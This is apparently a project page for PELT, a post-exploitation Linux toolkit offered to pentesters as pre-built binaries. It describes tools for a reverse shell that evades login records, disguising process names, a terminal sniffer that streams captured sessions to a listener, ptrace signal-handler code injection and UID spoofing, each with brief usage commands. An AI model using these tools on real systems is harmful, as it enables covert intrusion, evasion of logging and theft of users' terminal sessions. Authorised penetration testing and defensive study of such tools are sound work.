What is PELT?
PELT is the Post Exploitation Linux Toolkit. It is intended as a collection of Linux user space tools designed to assist pentesters during the post-exploitation phases of their engagement. The tools appear here as pre-built binaries for easy access in the field.
These tools are each projects of mine with their own Github pages. Please refer to these project pages for full descriptions as well as source code.
revsh is a reverse shell. It was designed to meet the needs of pentesters facing long engagements. The features include:
- Full terminal support.
- Unicode support.
- Circumvention of the login record. (utmp / wtmp)
- rc file support for launching recurring / cutomized commands upon login.
- OpenSSL encryption with key based authentication baked into the binary.
- Anonymous Diffie-Hellman encryption upon request.
- Ephemeral Diffie-Hellman encryption as default.
- Cert pinning for protection against sinkholes and mitm counter-intrusion.
- Connection timeout for remote process self-termination.
- Randomized retry timers for non-predictable auto-reconnection.
- Netcat style non-interactive data brokering for file transfer.
Project page: https://github.com/emptymonkey/revsh
Pre-built binaries: x86_64-Linux, i686-Linux, amd64-FreeBSD
Tarball of the keys / certs used with these binaries: keys.tar
Example:
empty@monkey:~$ ./revsh -c
user@target:~$ ./revsh
Note: The pre-built binaries here use the default keys provided. If you are using this anywhere sensitive, you are strongly encouraged to download the source and build your own copy. This will generate unique keys / certs. As always, your mission is only as secure as your key management process.
mimic is a tool that allows a user to run a program, but have it show up in the process table as something different. The name in the process listing can be any string. mimic does not require root privileges.
Project page: https://github.com/emptymonkey/mimic
Pre-built binaries: x86_64-Linux
Example:
empty@monkey:~$ ./mimic -e "/bin/bash" -m "/sbin/getty 38400 tty0"
set_target_pid is a simple program that resets the Process ID (PID) numbers being issued by the system as close as possible to a target. This program is part of the mimic project. This program does not require root privileges.
Project page: https://github.com/emptymonkey/mimic
Pre-built binaries: x86_64-Linux
Example:
empty@monkey:~$ ./set_target_pid 1
Note: The target PID is only a target. set_target_pid will try to get as close as possible, but that PID may simply not be available. The PIDs smaller than 300 appear to be reserved for kernel threads. If you request a PID of '1', then look for the result around '300'. Finally, after you set the PIDs being issued to your target and you have launched your payload, don't forget to reset the PIDs again to where they were before.
shelljack is terminal sniffer. (This is similar to a keystroke logger, but it gathers all input and output.) shelljack does not require root privileges (except on Ubuntu systems).
Project page: https://github.com/emptymonkey/shelljack
Pre-built binaries: x86_64-Linux
Example:
empty@monkey:~$ ncat -l 192.168.1.42 9999
user@target:~$ ./shelljack 192.168.1.42:9999 $$
Note: shelljack uses ptrace() to attach to processes. Because Ubuntu is patched specifically against this type of attack, shelljack won't work on Ubuntu systems unless it is run as root.
sigsleeper injects malicious code into a process that can be triggered by sending that process a signal. This type of attack is best describes as a "malicious signal handler injection with ptrace" attack. Because the injected code will sit quietly until it receives it's signal, at which point it will then launch its payload, I refer to this as "sleeper code". sigsleeper does not require root privileges (except on Ubuntu systems).
Project page: https://github.com/emptymonkey/sigsleeper
Pre-built binaries: x86_64-Linux
Example:
empty@monkey:~$ sigsleeper -f -e '/bin/echo Hello world!' $$
empty@monkey:~$ kill -USR1 $$
empty@monkey:~$ Hello world!
Note: sigsleeper uses ptrace() to attach to processes. Because Ubuntu is patched specifically against this type of attack, sigsleeper won't work on Ubuntu systems unless it is run as root.
pretend is a very simple program that changes your UID / GIDs. pretend does require root privileges. This program is useful for programmatically changing your UID on the fly without requiring that the UID maps to a valid account on the host. There are a class of attacks for which this tool is very nice to have available.
Project page: https://github.com/emptymonkey/pretend
Pre-built binaries: x86_64
Example:
empty@monkey:~$ sudo pretend 5:26:103:110:50 id
uid=5(games) gid=26(tape) groups=60(games),50(staff),103(ssh),110(kvm)
I write and release these tools with the intention of educating the larger IT community and empowering legitimate pentesters. If I can write these tools in my spare time, then rest assured that the dedicated malicious actors have already developed versions of their own.